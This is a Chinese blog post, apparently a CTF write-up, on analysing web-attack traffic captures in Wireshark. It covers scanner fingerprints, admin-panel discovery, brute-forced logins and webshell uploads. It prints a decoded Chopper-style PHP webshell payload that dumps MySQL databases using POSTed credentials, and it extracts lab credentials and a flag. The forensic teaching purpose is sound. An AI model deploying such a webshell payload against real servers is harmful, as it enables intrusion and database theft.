2021-05-03Wireshark流量包分析

目录

WEB扫描分析

后台目录爆破分析

后台账号爆破

WEBSHELL上传

其他题目

        参考链接


WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。

WEB扫描分析

题型:

通过给出的流量包获取攻击者使用的WEB扫描工具。

解题思路:

常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,WebReaver,Sqlmap等。要识别攻击者使用的是哪一种扫描器,可通过wireshark筛选扫描器特征来得知。

相关命令:http contains “扫描器特征值”。

1.awvs:acunetix

2.netsparker:netsparker

3.appscan:Appscan

4.nessus:nessus

5.sqlmap:sqlmap

常见的扫描器特征参考:常见扫描器或者自动化工具的特征(指纹)

【练习】安恒八月月赛流量分析:黑客使用的是什么扫描器?

后台目录爆破分析

题型:

已知攻击者通过目录爆破的手段获取了网站的后台地址,请通过给出的流量包获取后台地址。

解题思路:

要获取流量包中记录的后台地址,可通过wireshark筛选后台url特征来得知。

相关命令:http contains “后台url特征”。

常见后台url特征:

1.admin

2.manager

3.login

4.system

 

【练习】安恒八月月赛流量分析:黑客扫描到的后台登录地址是什么?

2021-05-03Wireshark流量包分析_第1张图片

/admin/login.php?rec=login 

后台账号爆破

题型:

已知攻击者通过暴力破解的手段获取了网站的后台登陆账号,请通过给出的流量包获取正确的账号信息。

解题思路:

WEB账号登陆页面通常采用post方法请求,要获取流量包中记录的账号信息可通过wireshark筛选出POST请求和账号中的关键字如‘admin’。

相关命令:http.request.method=="POST"  and  http contains "关键字"

【练习】安恒八月月赛流量分析:黑客使用了什么账号密码登录了web后台?

思路1:登陆后台99%使用的是POST方法,使用过滤器+追踪TCP流,有302重定向则登录成功。刚才使用扫描的源ip一定是黑客的ip地址,使用过滤可得

http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"

2021-05-03Wireshark流量包分析_第2张图片

思路2:返回字段长度为75X,说定post登录成功(目前没搞懂)

2021-05-03Wireshark流量包分析_第3张图片

 WEBSHELL上传

题型:

已知攻击者上传了恶意webshell文件,请通过给出的流量包还原出攻击者上传的webshell内容。

解题思路:

Webshell文件上传常采用post方法请求,文件内容常见关键字eval,system,assert要。获取流量包中记录的webshell可通过wireshark筛选出POST请求和关键字.

相关命令:http.request.method=="POST"  and  http contains "关键字"

【练习】安恒八月月赛流量分析:黑客上传的webshell文件名是?内容是什么?

2021-05-03Wireshark流量包分析_第4张图片

Form item: "action" = "QGluaV9zZXQgKCAiZGlzcGxheV9lcnJvcnMiLCAiMCIgKTtAc2V0X3RpbWVfbGltaXQgKCAwICk7
QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSAoIDAgKTtlY2hvICgiLT58Iik7OyRtID0gZ2V0X21h
Z2ljX3F1b3Rlc19ncGMgKCk7JGNvbmYgPSAkbSA/IHN0cmlwc2xhc2hlcyAo

2021-05-03Wireshark流量包分析_第5张图片 这样好像并不完整,追踪tcp流

2021-05-03Wireshark流量包分析_第6张图片

2021-05-03Wireshark流量包分析_第7张图片

2021-05-03Wireshark流量包分析_第8张图片

其他题目

1.某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么

思路一:导出对象,搜索robots.txt

2021-05-03Wireshark流量包分析_第9张图片

保存,然后打开

2021-05-03Wireshark流量包分析_第10张图片

flag:flag:87b7cb79481f317bde90c116cf36084b

思路二:直接过滤http contains"Disallow"

2021-05-03Wireshark流量包分析_第11张图片

2.某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少

2021-05-03Wireshark流量包分析_第12张图片

2021-05-03Wireshark流量包分析_第13张图片 常见的方法是:

根据http contains"dbhost"找到数据库服务器地址10.3.3.101之后,追踪tcp流

2021-05-03Wireshark流量包分析_第14张图片2021-05-03Wireshark流量包分析_第15张图片

@ini_set ( "display_errors", "0" );@set_time_limit ( 0 );@set_magic_quotes_runtime ( 0 );echo ("->|");;$m = get_magic_quotes_gpc ();$conf = $m ? stripslashes ( $_POST ["z1"] ) : $_POST ["z1"];$ar = explode("choraheiheihei", $conf);$dbn = $m ? stripslashes ( $_POST ["z2"] ) : $_POST ["z2"];$sql = base64_decode ( $_POST ["z3"] );$T = @mysql_connect($ar[0],$ar[1],$ar[2]);@mysql_query ( "SET NAMES utf8" );if($dbn==""){$sql = "SHOW DATABASES";$q = @mysql_query ( $sql );$i = 0;while($rs=@mysql_fetch_row($q)){echo(trim($rs[0]).chr(9))."\t|\t\r\n";}@mysql_close($T);;echo("|<-");die();}else{    @mysql_select_db ( $dbn );$q = @mysql_query ( $sql );$i = 0;while ( $col = @mysql_field_name ( $q, $i ) ) {echo ($col . "\t|\t");$i ++;}echo ("\r\n");while ( $rs = @mysql_fetch_row ( $q ) ) {for($c = 0; $c < $i; $c ++) {echo (trim ( $rs [$c] ));echo ("\t|\t");}echo ("\r\n");}@mysql_close ( $T );;echo ("|<-");die ();}

base64解码之后,如上
 

提取出以下主要文本

&z1=10.3.3.101choraheiheiheiwebchoraheiheiheie667jUPvJjXHvEUv&z2=web&z3=c2VsZWN0ICogZnJvbSBkb3Vfc2hvdw==
$ar = explode("choraheiheihei", $conf)
可知以choraheiheihei为分割符号,提取出用户名为web,密码为e667jUPvJjXHvEUv

 

3.某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么(手上没有webtwo.pcap)

4.某公司内网网络被黑客渗透,请分析流量,黑客破解了账号[email protected]得到的密码是什么

 

  1. 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip

2021-05-03Wireshark流量包分析_第16张图片

某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)(没有对应的pcap)

某公司内网网络被黑客渗透,请分析流量,黑客获得的的ip是多少(没有对应的pcap)

参考链接

CTF流量分析之题型深度解析

ctf之流量分析

安恒八月月赛流量分析writeup

你可能感兴趣的:(ctf)